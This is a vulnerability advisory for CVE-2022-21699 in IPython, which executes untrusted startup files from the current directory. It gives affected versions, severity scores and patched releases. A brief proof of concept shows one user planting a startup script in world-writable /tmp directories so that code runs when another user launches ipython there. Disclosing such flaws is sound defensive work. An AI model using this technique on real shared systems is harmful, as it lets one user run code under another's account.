CVE-2022-21699 – ipython

Package

Manager: pip
Name: ipython
Vulnerable Version: >=0 <5.11 || >=6.0.0 <7.16.3 || >=7.17.0 <7.31.1 || >=8.0.0 <8.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P

EPSS: 0.02018 pctl0.8304

Details

Execution with Unnecessary Privileges in ipython We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another. Proof of concept User1: ``` mkdir -m 777 /tmp/profile_default mkdir -m 777 /tmp/profile_default/startup echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py ``` User2: ``` cd /tmp ipython ``` User2 will see: ``` Python 3.9.7 (default, Oct 25 2021, 01:04:21) Type 'copyright', 'credits' or 'license' for more information IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help. stealing your private secrets ``` ## Patched release and documentation See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699, Version 8.0.1, 7.31.1 for current Python version are recommended. Version 7.16.3 has also been published for Python 3.6 users, Version 5.11 (source only, 5.x branch on github) for older Python versions.

Metadata

Created: 2022-01-21T18:55:30Z
Modified: 2024-09-27T17:22:07Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-pq7m-3gw7-gq5x/GHSA-pq7m-3gw7-gq5x.json
CWE IDs: ["CWE-250", "CWE-269", "CWE-279"]
Alternative ID: GHSA-pq7m-3gw7-gq5x
Finding: F159
Auto approve: 1